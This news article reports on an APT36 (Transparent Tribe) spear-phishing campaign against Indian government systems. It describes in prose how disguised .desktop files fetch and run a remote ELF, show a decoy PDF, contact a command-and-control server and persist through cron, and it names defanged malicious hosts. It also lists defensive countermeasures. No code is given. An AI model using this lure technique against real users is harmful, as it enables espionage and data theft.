Indian Government Systems Under Attack: Hackers Deploy Fake Shortcut Files

Indian Government Systems Under Attack: Hackers Deploy Fake Shortcut Files
In a concerning turn of events, Indian government systems are facing renewed cyber threats as the notorious hacker group Transparent Tribe (APT36) leverages deceptive tactics to break into official networks. The group has deployed weaponized shortcut files that masquerade as legitimate PDF documents, targeting both Windows and BOSS (Bharat Operating System Solutions) Linux systems.
Attack Strategy and Execution
According to security firm CYFIRMA, the campaign begins with spear-phishing emails that appear to contain meeting notices. These emails carry seemingly innocuous files such as “Meeting_Ltr_ID1543ops.pdf.desktop”. Once opened, these files execute a shell script that:
Downloads a hex-encoded ELF binary from an attacker-controlled server (e.g., securestore[.]cv),
Executes the binary,
Opens a decoy PDF (often via Firefox) to mislead the user, while the real malware operates stealthily in the background
The malicious payload then communicates with a hardcoded command-and-control server (modgovindia[.]space:4000) to receive commands and exfiltrate data . Moreover, persistence is established via a cron job, ensuring the malware remains active even after reboot or termination The
Broader Impact and Technical Sophistication
APT36’s tactics extend beyond Linux. The group also targets Windows systems with tailored shortcut techniques, alongside deploying remote access tools and backdoors like Poseidon. These enable credential harvesting, data exfiltration, and long-term access across compromised environments
Additional surveillance by cybersecurity firms such as Hunt.io and CloudSEK highlights that the malware incorporates anti-debug and anti-sandbox mechanisms—designed to evade detection by automated security tools
Persistent Threat from APT36
Transparent Tribe, operational since at least 2013, is widely attributed to Pakistani origin and is known for its long history of cyber-espionage against Indian government institutions, especially in defense sectors GovInfoSecuritySecurity Week. The group’s evolving methods underscore a growing threat to national digital infrastructure.
What This Means for Indian Cybersecurity
The use of fake shortcut files underlines a critical vulnerability—social engineering remains a potent vector. As a countermeasure, security experts recommend:
Disabling auto-execution of desktop shortcuts and implementing application allow-lists on BOSS Linux images.
Enforcing read-only modes for documents and isolating downloads from untrusted networks.
Adopting zero-trust segmentation to limit lateral movement in compromised environments
Stay Informed
To remain updated with the latest developments in technology and cybersecurity, read more on our Technology page:
Visit the Latest Tech News